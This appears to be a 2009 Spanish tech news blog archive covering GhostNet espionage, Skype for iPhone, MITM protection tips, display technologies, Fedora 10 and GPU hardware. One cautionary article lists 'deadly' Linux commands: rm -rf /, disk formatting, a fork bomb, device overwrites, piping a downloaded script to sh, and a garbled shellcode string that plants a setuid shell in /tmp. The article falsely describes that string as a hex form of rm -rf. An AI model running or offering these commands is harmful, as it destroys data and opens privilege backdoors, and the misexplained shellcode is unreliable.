Tuesday, March 31, 2009

Descubren una red de espionaje cibernético sobre 103 países

La dieron a conocer un grupo de investigadores canadienses. Tiene su base en China y se especializa en el control de los sistemas informáticos del Dalai Lama y exiliados tibetanos en todo el mundo. Se introdujeron además en computadoras de diversos Ministerios de varios países

Los investigadores del Information Warfare Monitor explicaron que los crackers chinos penetraron los sistemas informáticos de la organización del Dalai Lama en India, Bélgica, Reino Unido y los EEUU y robaron documentos contenidos en la computadora de la oficina privada del líder tibetano.

Pero el grupo canadiense también desveló que los crackers chinos se infiltraron en los sistemas informáticos del ministerio de Asuntos Exteriores iraní, las embajadas de países como Alemania, Portugal, India, Corea del Sur y Taiwán así como medios de comunicación y un ordenador en la sede de la OTAN.

"Cerca del 30% de los ordenadores infectados pueden ser considerados como de alto valor e incluyen los ministerios de Asuntos Exteriores de Irán, Bangladesh, Letonia, Indonesia, Filipinas, Brunei, Barbados y Bután", afirmaron los investigadores a través de un comunicado.

En total, al menos 1.295 computadoras en 103 países de todo el mundo han sido infiltradas por los piratas informáticos.

Information Warfare Monitor (creado por el instituto de Ottawa SecDev Group y el Centro Munk de Estudios Internacionales de la Universidad de Toronto) denominó la red de espionaje como GhostNet.

La red funciona infiltrando sistemas informáticos e instalando en las computadoras programas para la recepción y envío de información.

Skype comienza a llegar al iPhone y al BlackBerry

Permitirá hacer llamadas telefónicas por Internet, mandar mensajes instantáneos y compartir fotos a un precio cero si se llama a otro usuario de Skype

Skype comienza a llegar al iPhone y al BlackBerry

El popular servicio de telefonía por Internet Skype estará disponible a partir de esta semana para los usuarios del iPhone de Apple y la BlackBerry, afirmó la compañía.

Según el blog corporativo de Skype, propiedad de la casa de subastas por Internet eBay, el lanzamiento de una aplicación de Skype para el iPhone y para el reproductor de mp3 iPod Touch se anunciará oficialmente el martes, en la feria de telefonía CTIA Wireless 2009 de Las Vegas.

El servicio estará disponible esta semana y algo más tarde, posiblemente en mayo, para los usuarios de la BlackBerry.

Skype para iPhone permitirá hacer llamadas telefónicas usando Internet, mandar mensajes instantáneos o incluso compartir fotos a un precio cero si se llama a otro usuario del servicio y con tarifas muy bajas para las llamadas a otros números.

En EE.UU., Skype para iPhone sólo funcionará a través de la red wi-fi de conexión a Internet y no mediante la red telefónica, una condición demandada por las operadoras de telefonía que no quieren ver reducido su negocio.

Skype, líder del sector de telefonía por Internet con unos 400 millones de usuarios registrados no será, sin embargo, el primer servicio de VoIP en llegar al iPhone, donde varias compañías ofrecen ya aplicaciones para realizar llamadas gratuitas a través de la red.

El jefe de Operaciones de Skype, Scott Durchslag, dijo que tenía grandes esperanzas en el éxito de la aplicación en el iPhone y que espera que la nueva característica de Skype llegará a nuevos y viejos usuarios.

"La petición número uno que nos ha llegado de los usuarios es hacer que Skype estuviera disponible en el iPhone. Hay una demanda acumlada", añadió Durchslag.

Una de las grandes novedades de la versión para iPhone permite a los suscriptores usar el número de teléfono de la agenda telefónica del dispositivo para llamar, de modo que no tienen que duplicar las listas.

La aplicación de Skype para el iPhone será de descarga libre y permitirá realizar llamadas entre usuarios. En el resto de llamadas, las tarifas se aplicarán para llamadas tradicionales.

El servicio también funcionará en la última versión del iPod Touch, que tiene WiFi pero no conexión telefónica. El dispositivo se lanzó en septiembre de 2008 e incluía micrófono, novedad respecto al primer iPod Touch lanzado en 2007.

Además, mientras el servicio de Skype video es muy popular entre los usuarios de computadoras, Durchslag dijo que la compañía está considerando ofrecer video para el iPhone o para otros teléfonos.

"Estamos considerando el video pero también estamos teniendo en cuenta la calidad. Si lo hacemos, lo haremos increíblemente bien".

Un analista de CCS Insight, Ben Wood, señaló que si Skype puede repetir la popularidad de su servicio de computadoras en el móvil, eso ayudará a que despegue el servicio para móviles.

"Estoy firmemente convencido de que Skype podrá encontrar una forma de unir las cámaras de los móviles y las de las computadoras" de modo que se pueda crear una oportunidad de desarrollarse en el teléfono.

Cómo protegerse de los ataques que lo llevan a una web falsa

Las técnicas más comunes para engañar incluyen correos electrónicos de phishing, sitios inalámbricos falsos y el ataque a servidores no seguros

Cómo protegerse de los ataques que lo llevan a una web falsa

Debido al nuevo tipo de ataque denominado en inglés "man-in-the-middle" (MITM), por el cual el usuario de la web es llevado a una página falsa con motivos fraudulentos, revelado en la conferencia Black Hat, especializada en vulnerabilidades informáticas, la empresa VeriSign, proveedor de servicios de infraestructura de Internet, difundió una serie de consejos para usuarios finales y organizaciones.

El ataque mencionado es una nueva versión del ataque MITM, en el cual el usuario sufre un engaño y es llevado al sitio web incorrecto.

Las técnicas más comunes para engañar a los visitantes incluyen correos electrónicos de phishing, sitios inalámbricos falsos y, más recientemente, el ataque a servidores DNS no seguros.

El ardid utiliza un servidor fraudulento para interceptar las comunicaciones entre el navegador del usuario y un sitio web legítimo, y luego funciona como proxy, capturando información confidencial por HTTP (no HTTPS) entre el navegador y el servidor fraudulento.

Lo que hace que este ataque sea diferente de los ataques MITM anteriores es que el sitio fraudulento intenta aprovechar señales visuales falsas, reemplazando el icono de favorito del sitio fraudulento por un icono del candado, que tradicionalmente se identifica como una señal visual de sitio protegido con SSL, informó VeriSign.

Sin embargo, si bien este ardid puede reproducir el candado, no puede recrear el indicador HTTPS legítimo o el color verde aún más evidente de la barra de direcciones en los navegadores web de alta seguridad, en los que el sitio está protegido con un Certificado EV SSL (Extended Validation Secure Socket Layer).


Para ayudarlos a protegerse de los ataques MITM, pueden aplicarse los siguientes consejos.

Usuarios finales

  • Busque el “color verde” en la barra de direcciones: Los ataques man-in-the-middle y de phishing que se encuentran en la actualidad se pueden combatir a través de los Certificados EV SSL y prestando atención cuando falta el brillo o color verde. Los Certificados EV SSL confirman en forma definitiva la identidad de la organización que posee el sitio web. Los criminales informáticos no tienen acceso a los Certificados EV SSL de los sitios que falsifican y, por lo tanto, no pueden imitar el color verde que muestra que un sitio web autenticado es seguro.
  • Descargue la última versión de los navegadores web de alta seguridad, como Internet Explorer 8 o versión superior, FireFox 3 o versión superior, Google Chrome, Safari u Opera.
  • Aproveche los dispositivos de autenticación como los tokens y otras formas de autenticación con dos factores para cuentas confidenciales.
  • Trate los correos electrónicos que reciba de remitentes desconocidos con un alto grado de escepticismo y no haga clic en enlaces para obtener acceso a sitios seguros (escriba la dirección del sitio en el navegador).

Empresas

  • Adopte el EV SSL y capacite a los clientes sobre lo que significa el color verde. Coloque el Certificado SSL EV en su página de inicio y en cualquier otra página donde se realice una transacción segura.
  • No ofrezca logins en páginas que todavía no están en una sesión SSL.
  • Ofrezca autenticación con dos factores a los clientes como una forma opcional de agregar otro nivel de seguridad cuando se obtiene acceso a las cuentas.
  • No incluya enlaces en los correos electrónicos que envíe a clientes y pídales que descarguen la última versión de sus navegadores de su preferencia

“Aunque los criminales informáticos estuvieron utilizando Certificados SSL de autenticación baja en los ataques tipo phishing y man-in-the-middle durante años, la presentación en la conferencia de seguridad Black Hat es un buen recordatorio para que los usuarios finales estén alertas cuando realizan transacciones en línea”, dijo Tim Callan, vicepresidente de marketing de producto de VeriSign.

“Las amenazas de seguridad se presentan de muchas maneras, y estar un paso adelante requiere capacitación por parte de los usuarios finales y un enfoque de seguridad completa y en capas por parte de los sitios web para garantizar que los usuarios tengan una experiencia segura”, agregó.

Monday, March 30, 2009

Via lleva el video HD a los sistemas de pequeño formato

La empresa anunció una nueva plataforma, llamada “Trinity”, que promete facilitar el diseño de sistemas con elevadas prestaciones multimedia y muy bajo consumo energético. La nueva plataforma utilizará el formato mini-ITX 2.0, el procesador Via Nano, procesamiento de gráficos S3 Graphics Chrome y chipsets Via.

“Con Mini-ITX 2.0, declaramos que el formato pequeño no implicaba un compromiso de tecnologías esenciales o performance”, dijo Richard Brown, vicepresidente de marketing de Via Technologies. “La plataforma Via Trinity es una extensión natural de esa filosofía, para sistemas ultra compactos. La plataforma aprovecha la larga experiencia de Via en formatos pequeños para ofrecer una verdadera experiencia de alta definición en dispositivos de tamaño reducido”.

La plataforma Via Trinity se compone de tres chips: procesador Via Nano o Via C7, chipset Via VX800 (de único chip) y GPU Via Chrome de las series 500, 400 ó 20.

La serie de chips gráficos S3 Graphics Chrome 400 y 500 soportan las más recientes versiones de las APIs DirectX 10.1 y OpenGL, además de ofrecer decodificación por hardware de video de alta definición en formatos H.264, MPEG-4, VC-1 WMV-HD y AVS, lo que los hace aptos para sistemas multimedia o computadoras utilizadas como home-theater.

El lanzamiento de Via Trinity es otro ejemplo de la importancia creciente de las plataformas informáticas integradas. Por separado, ni el chip Via Nano ni la GPU S3 Graphics Chrome pueden competir contra las propuestas de compañías tales como AMD, Intel o Nvidia en términos de performance. Pero cuando los chips se ofrecen como una solución integrada y completa para equipos multimedia de bajo costo y bajo consumo, pueden resultar interesantes.

Así serán las pantallas y monitores del futuro

Hasta ahora, el sector de las pantallas para computadoras portátiles y dispositivos multimedia estaba dominado por la tecnología LCD (TFT) y las pantallas de plasma. Sin embargo, la utilización de nuevos materiales y las mejoras técnicas en estas tecnologías están generando un cambio y, actualmente, los fabricantes de equipos tienden a usar más tecnología de diodos LED. No obstante, se espera que este sistema sea sustituido en un futuro por otros aún más eficientes en consumo.


Las tendencias en cuanto a la configuración de las nuevas pantallas para portátiles son claras: más planas, luminosas y con un menor gasto energético. A esta lista se puede añadir un abaratamiento de la tecnología que las hace posibles al aumentar la demanda, gracias a la utilización de componentes y materiales de menor costo.

Hay que pensar que el mercado de las pantallas de pequeño formato no está formado sólo por portátiles; en los últimos años, debido al aumento del tamaño y capacidad de los teléfonos móviles, estos han pasado a utilizar la misma tecnología de pantalla que las computadoras y los televisores. Por ejemplo, el terminal móvil Sharp Aquos Fulltouch 931SH es un teléfono móvil comercializado en el mercado japonés que ofrece una resolución de 1024 x 480 pixeles (muy alta) en una pantalla de 3,8 pulgadas.

Para ello, utiliza la tecnología Sharp Aquos, presente en la línea de televisores y monitores de la marca nipona. La pantalla es táctil y está preparada para ver contenidos en formato 16:9 a toda pantalla. Además, dispone de sintonizador de televisión digital "one-seg" (una tecnología de televisión digital para móvil estándar en Japón).

Tecnología de cristal líquido
Las pantallas LCD han sido las reinas del sector durante los últimos años. Sin embargo, están siendo reemplazadas por las pantallas iluminadas con diodos LED, de menor consumo y un mayor nivel de iluminación. No obstante, algunos fabricantes, como Omron, siguen implementando nuevas mejoras en pantallas LCD. Esta empresa japonesa ha desarrollado una pantalla que reduce hasta un 33 % el consumo energético necesario para mostrar un brillo y una iluminación óptima, y sin necesidad de reducir las prestaciones de la pantalla.

Para conseguirlo, utiliza sólo tres tubos fluorescentes en forma de U, frente a los seis tubos convencionales. Además, usa una resina en las lámparas que mantiene la temperatura de funcionamiento en 50 grados centígrados.

Tecnología OLED
La tecnología OLED es una de las grandes apuestas de la industria para la creación de pantallas muy delgadas y presentes en multitud de dispositivos portátiles, como computadoras, reproductores multimedia y teléfonos móviles. Esta tecnología, basada en diodos LED orgánicos, mejora en prestaciones respecto a otras. Cada punto de la pantalla se ilumina y cambia de color en función de la intensidad eléctrica recibida. En ausencia de este estímulo eléctrico, el negro se muestra con mayor definición y profundidad.

Además, debido a sus características es posible crear pantallas con estructura flexible de pocos milímetros de grosor. Recientemente, Samsung ha presentado un prototipo de pantalla OLED de tan sólo 0,05 milímetros de grosor. Un poco más fino que una hoja de papel común. Por ahora, la resolución ofrecida es de 480 x 272 pixeles con un contraste de 100.000: 1 y un brillo estimado en 200 CD/M2, prestaciones menores que las ofrecidas por las pantallas LCD, pero con un futuro esperanzador.

Por otro lado, empresas como Sony apuestan por el OLED como la tecnología a utilizar en futuros televisores y portátiles. Entre sus últimas propuestas destacan prototipos de futuras pantallas con sólo 0.3 milímetros de grosor.

Tecnología FED
Las pantallas FED utilizan un sistema que remite a los televisores clásicos de rayos catódicos (CRT) combinados con las pantallas LCD. Se trata de nanotubos de carbono que actúan como emisores de electrones. Cada nanotubo de carbono se comporta de igual manera que lo haría un tubo en una pantalla CRT. De esta manera, son capaces de ofrecer la resolución de una pantalla CRT con el grosor de una pantalla plana de tecnología LCD.

Entre los fabricantes interesados en esta tecnología se encuentra la japonesa Sony que, a pesar de su apuesta decidida por OLED, tiene previsto lanzar al mercado las primeras pantallas FED a finales de 2009. Parece que la intención es utilizarlas en su línea de pantallas de televisión.

Tecnología EPD (Electronic Paper Display)
Conocida como "papel electrónico", esta tecnología está llamada a ser utilizada en multitud de soportes y dispositivos, al poder fabricarse con un grosor muy delgado y materiales flexibles. Empresas como Plastic Logic disponen de los primeros prototipos de uso real que podrían ser implementados en futuros dispositivos portátiles.

Una de las primeras experiencias de uso masivo la ha realizado la revista Esquire en su número correspondiente al mes de octubre. Para celebrar su 75 aniversario, insertó en la portada una pantalla con papel electrónico EPD. La duración de la batería de esta pantalla era de 90 días, aunque podía extenderse mediante pequeños trucos.

(Fuente: Consumer Eroski)

Los 7 comandos mortales para Linux

Si te estas iniciando en el mundo de Gnu/Linux, no esta de más que tomes nota sobre las cosas que nunca deberías hacer. Es por ello que, a continuación, te mostramos 7 comandos que son mortales para el funcionamiento del sistema operativo del pingüino.

Algunos de estos comandos mortales son:

1. rm -rf /

Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.

2. char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “xebx3ex5bx31xc0x50x54x5ax83xecx64x68″ “xffxffxffxffx68xdfxd0xdfxd9x68x8dx99″ “xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7″ “x56x04xf7x56x08xf7x56x0cx83xc4x74x56″ “x8dx73x08x56x53x54x59xb0x0bxcdx80x31″ “xc0x40xebxf9xe8xbdxffxffxffx2fx62x69″ “x6ex2fx73x68x00x2dx63x00″ “cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;”;

Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.

3. mkfs.ext3 /dev/sda

Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).

4. :(){:|:&};:

Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.

5. cualquier_comando > /dev/sda

Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.

6. wget http://alguna_url -O- | sh

Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.

7. mv /home/tu_usuario/* /dev/null

Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).

Sunday, March 29, 2009

Cinco innovaciones que cambiarán la vida cotidiana

Explorar el futuro es saludable para la mente, porque ayuda a mantener las neuronas atentas a las tendencias que circulan a toda prisa por la vida moderna. IBM no es ajena a esta idea y cada año reúne a sus pensadores e investigadores para producir la lista “Los próximos cinco en cinco”. Es decir, qué innovaciones, cambios o elementos transformarán en el siguiente lustro el trabajo, la vida y el juego.

La tecnología solar para el ahorro de energía será incorporada al suelo, la pintura y las ventanas
¿Alguna vez se preguntó cuánta energía solar podría crearse si la tecnología solar estuviera integrada a las aceras, los caminos, los revestimientos, la pintura, los techos y las ventanas? En los próximos cinco años, la energía solar será una opción accesible para usted y sus vecinos.

Hasta ahora, los materiales y el proceso de producir células solares para generar energía solar han sido demasiados costosos para su adopción masiva. Pero eso está cambiando con la creación de las células fotovoltaicas de “película fina”, un nuevo tipo de célula solar eficiente en función de costos que puede ser hasta 100 veces más delgada que las células de obleas de silicio y producirse a menor costo.
Estas nuevas células de película fina pueden ser “impresas” y dispuestas sobre superficies flexibles, adecuadas no sólo para los techos sino también para los laterales de los edificios, ventanas polarizadas, teléfonos celulares, computadoras portátiles, automóviles e incluso la ropa.

Usted tendrá la bola de cristal de su salud
¿Qué sucedería si pudiera prever el destino de su salud y usar ese conocimiento para modificar su estilo de vida? Aunque le digan que las papas fritas, el queso y el vino no son buenos para la salud, ¿qué sucedería si descubriera específicamente que usted es alguien que puede consumir más de esos vicios sin tener un impacto negativo en su salud?

En los próximos cinco años, su médico podrá darle un mapa genético que le dirá qué riesgos de salud es probable que enfrente en su vida y cuáles son las medidas específicas que puede tomar para prevenirlos, en base a su ADN específico, todo por menos de u$s200.

Desde que los científicos descubrieron cómo descifrar el genoma humano completo, el descubrimiento abrió nuevas puertas para ayudar a develar los secretos encerrados en nuestros genes y predecir rasgos y estados de salud a los que podemos tener predisposición.

Los médicos podrán usar esta información para recomendar cambios en el estilo de vida y tratamientos. Los laboratorios farmacéuticos también podrán diseñar medicamentos nuevos y más eficaces, enfocados a cada uno de nosotros como pacientes individuales. El trazado genético transformará radicalmente la atención de la salud durante los próximos cinco años y le permitirá cuidarse mejor.

Usted le hablará a la Web... ¡y la Web le responderá!
La “relación” con la Web cambiará sustancialmente en los próximos cinco años. En el futuro, podrá navegar en Internet con manos libres, usando su voz y eliminando la necesidad de pantallas y teclados. La nueva tecnología cambiará la forma en que las personas crean, construyen e interactúan con la información y los sitios web de e-commerce, utilizando el habla en lugar de texto.

Sabemos que esto puede suceder porque la tecnología está disponible, pero también sabemos que puede suceder porque debe suceder. En lugares como la India, donde la palabra hablada es más prominente que la escrita en educación, gobierno y cultura, “hablarle” a la Web rápidamente supera a las demás interfaces, y el teléfono móvil está dejando atrás a la PC.

En el futuro, con el uso de “VoiceSites,” los que no tienen acceso a una computadora personal y a la Internet, o no pueden leer o escribir, podrán aprovechar todos los beneficios y la comodidad que ofrece la Web. Y a medida que la Web se vuelva más accesible con el uso de la voz, será más fácil de usar para todos. Imaginemos estar a una llamada telefónica de la capacidad de publicar, escanear y responder a e-mails y mensajes instantáneos, sin escribir. Podremos movernos en la web verbalmente para encontrar lo que buscamos y que la información nos sea leída, como si mantuviéramos una conversación con la web.

Tendrá sus propios asistentes de compras digitales
¿Alguna vez se encontró en un probador con todos los talles incorrectos y ningún asistente de ventas a la vista? ¿Y qué hay de la opinión de los amigos de que ese conjunto que ha elegido no le queda bien? En los próximos cinco años, los compradores dependerán cada vez más de sí mismos –y de las opiniones de los otros compradores- para tomar decisiones en lugar de esperar ser asistidos por los vendedores de la tienda.

Una combinación de nueva tecnología y la próxima ola de dispositivos móviles darán un notable impulso a la experiencia de compra en la tienda. Los almacenes pronto vendrán equipados con asistentes de compra digitales, kioscos con pantallas táctiles y activación por voz que le permitirán elegir prendas y accesorios para combinar o reemplazar lo que ya ha seleccionado. Una vez realizadas sus elecciones, se notificará a un vendedor, quien reunirá los artículos seleccionados y se los acercará al probador.

También podrá sacarse fotos con distintas combinaciones y mandarlas por e-mail o SMS a sus amigos y familiares para que le den el visto bueno… o malo. Los compradores accederán a calificaciones y críticas de productos de otros consumidores e incluso podrán bajar cupones de ahorro y utilizarlos instantáneamente en sus compras.

Olvidarse quedará en el olvido
¿La sobrecarga de información lo desvela de noche? Olvídela. En los próximos cinco años será mucho más fácil recordar qué comprar en el almacén, qué mandados hay que hacer, con quién habló en una conferencia, dónde y cuándo quedó en reunirse con un amigo o qué producto vio anunciado en el aeropuerto.

Los detalles de la vida cotidiana serán grabados, almacenados, analizados y entregados en el momento y lugar correcto, gracias a dispositivos inteligentes, tanto portátiles como fijos. Para que esto sea viable, micrófonos y videocámaras grabarán conversaciones y actividades.

La información recopilada será automáticamente almacenada y analizada en una computadora personal, que luego se encargará de “recordar” al usuario qué conversaciones tuvo, por ejemplo, con su hija o su médico, por teléfono.

En base a estas conversaciones, los teléfonos inteligentes, equipados con tecnología de posicionamiento global, también podrán recordarles ir a buscar los artículos comprados o los medicamentos recetados si pasan por una tienda en particular en un momento en particular. No cuesta imaginar que los televisores, controles remotos o incluso las superficies de las mesas de café alguna vez sean medios familiares que nos permitan explotar nuestra información almacenada digitalmente.

Descuentan del sueldo a empleados el tiempo de inicio de la PC

Una serie de empresas estadounidenses han comenzado a considerar el tiempo de inicio del PC como un periodo que no debe ser pagado a los empleados. Un abogado, representante de los empleadores, indica que es ilógico pagar a los empleados por ésos minutos de inactividad. Según el abogado, los empleados se dedican a actividades privadas después de haber encendido sus computadoras por la mañana.

Algunas empresas estadounidenses descuentan del sueldo de sus empleados el tiempo que estos esperan mientras sus estaciones de trabajo son iniciadas por las mañanas. Abogados estadounidenses han presentado una serie de demandas en representación de empleados que consideran que sus empleadores les están descontando injustamente de su salario el tiempo que toma iniciar el PC por la mañana.

La situación es descrita detalladamente en la publicación National Law Journal, por la abogada Tresa Baldas bajo el título "¿Es el período de boot trabajo o descanso?"

"Salen a fumar un cigarrillo, hablan con sus colegas o van a buscar una taza de café; es decir, no trabajan. Lo único que han hecho es presionar un botón o digitar una clave", indica el abogado Richard Rosenblatt de Morgan, Lewis & Bockius.

Las causas judiciales en cuestión consisten principalmente de demandas presentadas en los últimos meses por empleados que no aceptan que sus empleadores les descuentan entre 15 y 30 minutos de trabajo diario, que es el tiempo que toma conectarse y desconectarse de los diversos sistemas de la empresa.

10 pautas para el futuro de la informática de código abierto

Fedora, el último proyecto de colaboración de código abierto patrocinado por Red Hat, fijó 10 pautas entre las que se destacan mejoras en virtualización, instalación de software on-demand y tecnologías de conexión compartida. Esta nueva versión, llamada Fedora 10, ya se encuentra disponible. Paul Frields, líder del proyecto Fedora en Red Hat, explicó "su atractivo generalizado, combinado con la política de colaboración de Fedora con las comunidades primarias de software libre, significa que muchas de estas características aparecerán en otras distribuciones de Linux en el futuro”.

El Proyecto Fedora, un proyecto de colaboración de código abierto patrocinado por Red Hat con el respaldo de la comunidad, anunció la disponibilidad de Fedora 10, la última versión de la distribución gratis del sistema operativo de código abierto. Fedora 10 presenta diversas tecnologías de punta y continúa preparando el terreno para nuevas distribuciones de código abierto derivadas para toda la empresa.

“Los contribuyentes voluntarios de Fedora y los ingenieros de Red Hat trabajaron en conjunto para desarrollar las características de última tecnología que presenta Fedora 10. Su atractivo generalizado, combinado con la política de colaboración de Fedora con las comunidades primarias de software libre, significa que muchas de estas características aparecerán en otras distribuciones de Linux en el futuro”, explicó Paul Frields, líder del proyecto Fedora en Red Hat.

Cada seis meses aproximadamente, contribuyentes provenientes de los miembros de Fedora, que superan las 17.000 personas, colaboran en la generación de una plataforma de software sin costo, universal y completa. Desde sus inicios, Fedora ha asumido un rol líder en el desarrollo de software de código abierto y continúa demostrando su potencial en toda la empresa. Esta comunidad de usuarios y desarrolladores ha abierto el camino en lo que es el desarrollo de características clave y prepara enérgicamente el terreno para las tecnologías de código abierto presentes en muchas plataformas, inclusive Red Hat Enterprise Linux.

Fedora 10, la décima versión en cinco años, presenta mejoras considerables en virtualización para la instalación y gestión remota de la provisión de almacenamiento. Estas características facilitarán la administración de sistemas de anfitriones e invitados de máquinas virtuales posibilitando la automatización, especialmente a medida que sean integrados en Red Hat Enterprise Linux. Además, Fedora 10 incluye la función de conexión compartida NetworkManager, que permite a los usuarios de computadoras portátiles con Ethernet o una conexión móvil de banda ancha el enrutamiento de otros a Internet a través de la interfaz inalámbrica de la computadora portátil y obtener así colaboración instantánea en cualquier momento y lugar.

“Con el lanzamiento de Fedora 10, el Proyecto Fedora continúa con su tradición de innovación y comunidad. Fedora determina el modelo de características técnicas que son importantes para todos, desde los usuarios de escritorio hasta la empresa, y promueve el software libre alrededor del mundo”, comentó Frields.

Este lanzamiento incluye el estreno de un novedoso sistema de arranque gráfico denominado Plymouth, diseñado para acelerar el proceso de arranque al aprovechar una nueva característica de configuración del kernel. Plymouth fue diseñado por los contribuyentes de Fedora dirigido principalmente a tarjetas ATI, pero pronto se ampliará para soportar una variedad más amplia de tarjetas de memoria.

Fedora 10 también presenta un mayor soporte de hardware para un amplio abanico de cámaras Web, y un mejor manejo de impresoras por medio de tanto conexiones físicas directas como de redes. Asimismo, PackageKit, una herramienta de gestión de software que originalmente se lanzó en Fedora 9, ha sido ampliada en esta versión para proveer la instalación de software codec on-demand.

Fedora 10 también realza su compromiso con la seguridad mediante un novedoso grupo de herramientas de seguridad para control y detección denominado SecTool, un nuevo conjunto de enlaces Python que permite a los programadores utilizar la librería NSS validada por FIPS-140 para el veloz desarrollo de aplicaciones seguras. La distribución también amplía la característica de persistencia Live USB que tuvo su lanzamiento previo en Fedora 9, que añade soporte para un área separada de datos del usuario con cifrado optativo para lograr la máxima experiencia en computación segura y portátil. Entre las diversas características superiores que presenta Fedora 10, se incluye el nuevo OpenOffice.org 3.0 y GNOME 2.24.1 para una mayor productividad de escritorio y fácil uso; un sistema de audio modificado para mayor respuesta y menor uso de energía; un conjunto integral de herramientas para el diseño de dispositivos; y soporte para más hardware que cualquier otro sistema operativo.

El Proyecto Fedora realizará una Conferencia para Usuarios y Desarrolladores de Fedora (FUDCon) que tendrá lugar del 9 al 11 de enero de 2009 en Boston, Massachusetts. Se trata de un evento abierto y sin cargo para todos los asistentes. FUDCon ofrece la oportunidad a los miembros de la comunidad y principales contribuyentes de reunirse y dedicar tiempo a trabajar en los desafíos de interés común, perfeccionar el código y desarrollar nuevas funciones para el siguiente lanzamiento innovador de Fedora.

Saturday, March 28, 2009

Hynix reveló la memoria gráfica más veloz del mundo

Siendo uno de los principales proveedores mundiales de chips de memoria DRAM, Hynix Semiconductor anunció formalmente el lunes pasado sus chips GGDR5 capaces de operar a una velocidad de 7 GHz. La compañía comenzará a distribuir esos nuevos chips el año próximo, pero no se sabe aún si ATI y Nvidia los utilizarán con toda su velocidad.

Los nuevos chips de 1 Gb presentados por Hynix pueden correr a 7 GHz, lo que equivale a un 40 por ciento más que los chips más veloces disponibles en la actualidad. Las nuevas memorias de la empresa se construyen bajo la tecnología de proceso de 54nm de la compañía.

Además de su alta velocidad, los nuevos chips de Hynix también están diseñados para minimizar el consumo energético, requiriendo sólo 1,35 V de energía. Las DRAMs GDDR5 de la anterior generación requieren 1,5 V de energía, y pueden operar a una velocidad de hasta 4,5 GHz.

Los chips DRAM GDDR5 de 1 Gb de Hynix cumplen los estándares del JEDEC. La compañía planea iniciar la producción en volumen durante la primera mitad del año próximo.

Hynix no reveló si sus nuevos chips de 7 GHz están actualmente siendo testeados por sus principales clientes (ATI, la división de productos gráficos de AMD, y Nvidia). Teóricamente, los nuevos chips de memoria de 7 GHz podrán usarse en la placas gráficas de próxima generación de las líneas Radeon y GeForce, de ATI y Nvidia respectivamente, pero si se tiene en cuenta que los desarrolladores de GPUs tienden a ser conservadores en lo referido a las velocidades de reloj de las memorias DRAM, es posible que las nuevas placas gráficas usen los chips de Hynix a velocidades menores que la máxima.

Los chips de memoria GDDR5 de 7 GHz podrían proveer anchos de banda máximos de 224 GB/seg. o de 448 GB/seg. al conectarse a un procesador mediante un bus de memoria de 256 bits o de 512 bits, respectivamente.

Nvidia hace realidad el concepto de supercomputadora personal

Cuando se habla de supercomputadoras, las imágenes que vienen a la mente sugieren equipos grandes y costosos, con cientos o incluso miles de microprocesadores. Nvidia aspira a cambiar ese concepto con sus nuevas supercomputadoras personales Tesla. La empresa asegura que dichos equipos, basados enteramente en GPUs, son capaces de brindar el poder de cómputo de un cluster a una centésima parte del precio.

Las nuevas supercomputadoras Tesla de Nvidia pueden adquirirse por menos de U$S 10.000, y ofrecen (según afirma la empresa) un poder de procesamiento equivalente a 250 veces el que brindan las estaciones de trabajo normales de escritorio. A pesar de su gran poder de cómputo, los equipos Tesla se presentan en un formato de equipo de escritorio estándar.

“Todos hemos oído hablar de ‘supercomputadoras de escritorio’ en el pasado, pero esta vez es real”, dijo Burton Smith, de Microsoft, en un comunicado. “Nvidia y sus socios estarán entregando una performance destacable y una amplia aplicabilidad al mercado masivo. La computación heterogénea, donde las GPUs trabajan en tándem con las CPUs, es lo que hace tal revolución posible”.

Las supercomputadoras Tesla están basadas en la arquitectura CUDA de Nvidia, lo que permite que los equipos sean programados en lenguaje C. Hasta 960 núcleos de procesamiento paralelo pueden colocarse dentro del sistema. Nvidia asegura que las supercomputadoras Tesla están en uso en importantes centros de investigación, tales como el MIT, Cambridge y otros.

Las 7 etapas fundamentales de la recuperación ante desastres

La preparación de un plan de Recuperación ante Desastres no es sencilla. Pero, si se siguen determinados procedimientos, es posible sortear las dificultades y mantener la complejidad bajo control. He aquí una lista de consejos de CA para ayudar a tomar las mejores decisiones a quien esté a cargo de desarrollar un plan eficaz y ejecutable de este tipo. Así, su organización recuperará sus procesos importantes y podrá funcionar rápidamente luego de producirse un desastre.

Las recomendaciones de CA para la Recuperación ante Desastres adoptan el marco utilizado por el Instituto Nacional de Normas y Tecnología (NIST), una agencia de la Administración de Tecnología del Departamento de Comercio de los Estados Unidos. Esta entidad publica una “Guía para la Planificación de Contingencias en los Sistemas de Tecnologías de la Información” que, aunque orientada hacia las agencias gubernamentales, puede adaptarse para todo tipo de organización. Aunque es bastante larga y compleja, su esquema básico es sencillo y se compone de los siguientes siete pasos:
  1. Desarrollar la declaración de una política de planificación ante contingencias. Una política formal proporciona la autoridad y directrices precisas para armar un plan de contingencia eficaz.
  2. Efectuar un análisis de impacto sobre el negocio (Business Impact Analysis, ó BIA). El BIA ayuda a identificar y priorizar los sistemas y componentes de TI importantes.
  3. Identificar los controles preventivos. Las medidas que se tomen para reducir los efectos de las interrupciones del sistema pueden incrementar la disponibilidad de éste y reducir los costos del ciclo de vida de las contingencias.
  4. Desarrollar estrategias de recuperación. Unas estrategias de recuperación inteligentes aseguran que el sistema pueda recuperarse de manera rápida y eficaz después de una interrupción.
  5. Desarrollar un plan de contingencia de TI. El plan de contingencia debe contener directrices y procedimientos detallados para la recuperación de un sistema dañado.
  6. Prueba del plan, formación y ejercicios. Las pruebas del plan identifican lagunas en la planificación, a la vez que la formación prepara al personal de recuperación para la activación del plan; ambas actividades mejoran la eficacia del plan y la preparación global de la organización.
  7. Mantenimiento del plan. El plan debe ser un documento vivo y que se actualice con regularidad, a fin de mantenerse al día de las mejoras en los sistemas.
